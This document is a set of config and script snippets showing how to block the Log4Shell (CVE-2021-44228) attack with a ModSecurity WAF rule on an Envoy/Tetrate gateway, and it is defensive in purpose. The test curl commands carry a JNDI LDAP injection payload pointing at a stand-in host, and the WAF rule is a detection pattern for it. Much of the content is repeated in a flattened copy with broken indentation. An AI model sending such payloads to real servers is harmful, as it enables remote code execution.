incfly/step1-curl.sh

## step1-curl.sh
curl -H “Host: httpbin.tetrate.com” -H “User-Agent: ${JNDI://ldap://evial.xx/path}”  \
  –resolve “httpbin.tetrate.com:${GATEWAY_IP}” httpbin.tetrate.com/headers
< HTTP/1.1 200 OK
< server: envoy
< date: Tue, 28 Dec 2021 05:48:57 GMT
< content-type: application/json
< content-length: 28
< access-control-allow-origin: *
< access-control-allow-credentials: true
< x-envoy-upstream-service-time: 25
<
{
  "origin": "127.0.0.1"
}

## step1.sh
kubectl apply -f  https://raw.githubusercontent.com/istio/istio/master/samples/httpbin/httpbin.yaml
tctl apply -f ./ingress.yaml

## step2-apply.sh
kubectl apply -f ./waf.yaml

## step2-security.yaml
apiVersion: security.tsb.tetrate.io/v2
kind: Group
metadata:
 name: t1
 workspace: w1
 tenant: mycompany
 organization: myorg
spec:
 namespaceSelector:
   names:
   - "*/default"
 configMode: BRIDGED
---
apiVersion: security.tsb.tetrate.io/v2
kind: SecuritySetting
metadata:
 name: defaults
 group: t1
 workspace: w1
 tenant: mycompany
 organization: myorg
spec:
 wafSettings:
   ruleSets:
   - block-log4j

## step2-waf.yaml
apiVersion: security.tsb.tetrate.io/v2
kind: WafRuleset
metadata:
  name: block-log4j
  organization: myorg
spec:
  displayName: "Block Log4j Shell Attack"
  description: "Block traffic containing the special substring that can leads to remote execution attack."
  ruleSet: |
  SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|XML://*|XML://@* \
  \"@rx \\${jndi:\" \
  \"phase:4,id:9455,deny,status:403,msg:'Potential Remote Command Execution: Log4j CVE-2021-44228'\""

## step3-check.sh
curl -H “Host: httpbin.tetrate.com” -H “User-Agent: ${JNDI://ldap://evial.xx/path} \
  –resolve “httpbin.tetrate.com:${GATEWAY_IP}” httpbin.tetrate.com/headers
< HTTP/1.1 403 Forbidden
< date: Tue, 28 Dec 2021 04:42:26 GMT
< server: envoy
< content-length: 0
< x-envoy-upstream-service-time: 29
<
* Connection #0 to host httpbin left intact.

## step3-proxy.log
2021-12-28T04:42:26.357217Z     error   envoy wasm      wasm log: [extensions/modsecurity/plugin.cc:563]::doDisruptiveAction()
[audit log][client 10.60.0.16] ModSecurity: Access denied with code 403 (phase 4).
Matched "Operator Rx' with parameter jndi' against variable REQUEST_HEADERS:foo' (Value: jndi' )
[file "<<reference missing or not informed>>"] [line "9"] [id "9455"] [rev ""]
[msg "Potential Remote Command Execution: Log4j CVE-2021-44228"]
[data ""] [severity "0"] [ver ""] [maturity "0"] [accuracy "0"] [hostname "10.60.2.158"]
[uri "/ip"] [unique_id "1640666546"] [ref "o0,4v90,4"]

## tsbblog-log4j-ingress-dep.yaml
apiVersion: gateway.tsb.tetrate.io/v2
kind: IngressGateway
Metadata:
 organization: tetrate
 name: httpbin-gw-ingress
 group: httpbin-gw
 workspace: httpbin-ws
 tenant: tetrate
spec:
 workloadSelector:
   namespace: default
   labels:
     app: tsb-gateway-httpbin
 http:
   - name: httpbin
     port: 8000
     hostname: "httpbin.tetrate.com"
     routing:
       rules:
         - route:
             host: "default/httpbin.default.svc.cluster.local"
	curl -H “Host: httpbin.tetrate.com” -H “User-Agent: ${JNDI://ldap://evial.xx/path}” \
	–resolve “httpbin.tetrate.com:${GATEWAY_IP}” httpbin.tetrate.com/headers
	< HTTP/1.1 200 OK
	< server: envoy
	< date: Tue, 28 Dec 2021 05:48:57 GMT
	< content-type: application/json
	< content-length: 28
	< access-control-allow-origin: *
	< access-control-allow-credentials: true
	< x-envoy-upstream-service-time: 25
	<
	{
	"origin": "127.0.0.1"
	}
	kubectl apply -f https://raw.githubusercontent.com/istio/istio/master/samples/httpbin/httpbin.yaml
	tctl apply -f ./ingress.yaml
	apiVersion: security.tsb.tetrate.io/v2
	kind: Group
	metadata:
	name: t1
	workspace: w1
	tenant: mycompany
	organization: myorg
	spec:
	namespaceSelector:
	names:
	- "*/default"
	configMode: BRIDGED
	---
	apiVersion: security.tsb.tetrate.io/v2
	kind: SecuritySetting
	metadata:
	name: defaults
	group: t1
	workspace: w1
	tenant: mycompany
	organization: myorg
	spec:
	wafSettings:
	ruleSets:
	- block-log4j
	apiVersion: security.tsb.tetrate.io/v2
	kind: WafRuleset
	metadata:
	name: block-log4j
	organization: myorg
	spec:
	displayName: "Block Log4j Shell Attack"
	description: "Block traffic containing the special substring that can leads to remote execution attack."
	ruleSet: \|
	SecRule REQUEST_LINE\|ARGS\|ARGS_NAMES\|REQUEST_COOKIES\|REQUEST_COOKIES_NAMES\|REQUEST_HEADERS\|XML://\|XML://@ \
	\"@rx \\${jndi:\" \
	\"phase:4,id:9455,deny,status:403,msg:'Potential Remote Command Execution: Log4j CVE-2021-44228'\""
	curl -H “Host: httpbin.tetrate.com” -H “User-Agent: ${JNDI://ldap://evial.xx/path} \
	–resolve “httpbin.tetrate.com:${GATEWAY_IP}” httpbin.tetrate.com/headers
	< HTTP/1.1 403 Forbidden
	< date: Tue, 28 Dec 2021 04:42:26 GMT
	< server: envoy
	< content-length: 0
	< x-envoy-upstream-service-time: 29
	<
	* Connection #0 to host httpbin left intact.
	2021-12-28T04:42:26.357217Z error envoy wasm wasm log: [extensions/modsecurity/plugin.cc:563]::doDisruptiveAction()
	[audit log][client 10.60.0.16] ModSecurity: Access denied with code 403 (phase 4).
	Matched "Operator Rx' with parameter jndi' against variable REQUEST_HEADERS:foo' (Value: jndi' )
	[file "<<reference missing or not informed>>"] [line "9"] [id "9455"] [rev ""]
	[msg "Potential Remote Command Execution: Log4j CVE-2021-44228"]
	[data ""] [severity "0"] [ver ""] [maturity "0"] [accuracy "0"] [hostname "10.60.2.158"]
	[uri "/ip"] [unique_id "1640666546"] [ref "o0,4v90,4"]
	apiVersion: gateway.tsb.tetrate.io/v2
	kind: IngressGateway
	Metadata:
	organization: tetrate
	name: httpbin-gw-ingress
	group: httpbin-gw
	workspace: httpbin-ws
	tenant: tetrate
	spec:
	workloadSelector:
	namespace: default
	labels:
	app: tsb-gateway-httpbin
	http:
	- name: httpbin
	port: 8000
	hostname: "httpbin.tetrate.com"
	routing:
	rules:
	- route:
	host: "default/httpbin.default.svc.cluster.local"